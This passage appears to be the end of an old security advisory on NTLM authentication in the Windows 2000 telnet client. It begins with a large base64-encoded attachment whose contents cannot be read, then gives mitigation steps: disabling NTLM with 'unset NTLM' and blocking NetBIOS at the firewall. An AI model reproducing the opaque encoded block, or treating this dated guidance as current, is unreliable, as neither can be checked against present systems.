AYUbVcus15oNCSD8hp710KeS5fDlw3qIjc9wpEe64TAjErbB8No2aumYOavEI3L80HmnBLCn
k2bfmTubLHd7w5FcXUzPyWS2rarUfDT9zln3BavX8xpfwxLP8BOBcUYT992DxLqf2T9/EgHl
QTwDz+uPsw4aPAkxM/NZo/bZNf7yx5OstxZvNL1y/VInHXwGC+NlZgQs81eZEbiGD0qJ9wjf
GXw/BtH0TR+GrODfe3ebnALEMIqzZsmOIOLGenGIGYuKhgF28qxqbk900SthhQUhVbhP9fac
OmSTELTE7NGGe2+J1KZoEIKZLFjMXE5wOt4xZzOFALgvesSx/YkeBpkWcY7DCkPjfnVctHEU
JUKwRHOJMAxTAwgSm6QOv+G5vPLSzfNglR8g+sHFA1Lw14+5cNHvt5rAplTQUCHLx76cB4wH
eIgX2MlVcckL0NkDT9lhS+hyKPf0FIK6WALcecEW5n1vTdTPpfKyhMlg+jGzj7EQWwfn8VjC
qpX1rvixNMZtlmMdJxDoVtZ7wQrVQomISOC/MKMU2oVSCYEqFJUun+YAOb8dz38n5bcLrALq
ZU4h4RiKcxPFq+jHq+hLVfQ/p4p+vIq+VEX/i6tYfqDzgdTyLiOdBsdQLndb8QGwnJDJRftG
yf9LQv5vca3M1/7s3+YBP/L7T0azYUX830YT+b+tZqOp+L+/0u8/vX79c+XmzffDC/bjxpt8
Ap1/td6xextu14uQ0INhiqS7a+UGywU6OMY2OuSI5mPOWhVhAbV93Cq4gg7M8Zy5IKODYldu
JfK2oXa7dFc+K+/cdVkwl7Bgbk+nSJBNTr9wxUaCE6TXIB/U0l1AEUFBEGMs2P1iTMwkuOyv
F1MXU3GPFjGOI82o738L4LbDOOM9hgWuG3JiPCLNCNJdcM/LjF2UUrzkjrdIco07vjdOhO2C
c3RZBPHgzdyD1MQ1jhqFNrM94mBl9mo6Cc9El+E/v+Naq8UUJX6uE3r1Q+tWsD3iZkgn/7tB
2yV+b+63Tt5dEUuGpd0KF+87rkwVoR7uaqWfbHCjd8GeBazbGldAxalET67HuiGnW++XOehd
WDFa4rky7W5BSRDHDmhlkRQkSmrcIp+Zr4uDw4J/jRO96ZTCvNU5zZwguwr5GnkSaq5oIFo+
kIQOhiGRikaDj9PKxdgeU7nNElFf3rxJ5w1dxjcb3w+4SuihY8oGTZGOIXGSlsl6A+MuzKiz
u8irZtP2l3P2uDN7TdxxglGO3JyClE/0+8mz4AL+nIhHKDrVEHpTpERTm/FjaikcMl+cZKQz
0+ngcQn1QNC1VcNTHVrm/P/TdX8wvP4vfv+hWq1XG+H8X2/W8fcfTcih5v+v8vsPV4vZ0vPd
C206mbBKwCoLJusCLK4YiFlT097yWUPEsg980o9PH7fsA6d0vNU04lMiHiH09uIbFh0Ngnm3
4PvcAQ6v0+PKjgiJggls2Nboi7fnYspfLabRZC3WEqKyerxf+K7meESMaa92zzUNVil2vglW
5xh6zhk7/xB2GloCeO2gbtrzmALEHIgdu+5deGXfRUmhCb392uaMn6+3a6U2K1GiRIkSJUqU
KFGiRIkSJUqUKFGiRIkSJUqUKFGiRIkSJUqUKFGiRIkSJUqUKPlK8jc45vNbAKAAAA==
-----
SOLUTION
The NTLM functionality in telnet.exe is optional, but it is
enabled by default on all W2000 installations. To turn of NTLM
in telnet, just run 'telnet.exe' without arguments which will get
you into a cli for setting/unsetting variables and so on. Then
type 'unset NTLM'. This will disable all NTLM functionality in
the client, so... if for some really ill-advised reason you want
or need this function, you're out of luck unless Microsoft comes
up with something better.
You do not pass NetBIOS through your firewall - incoming as well
as _outgoing_ traffic, right?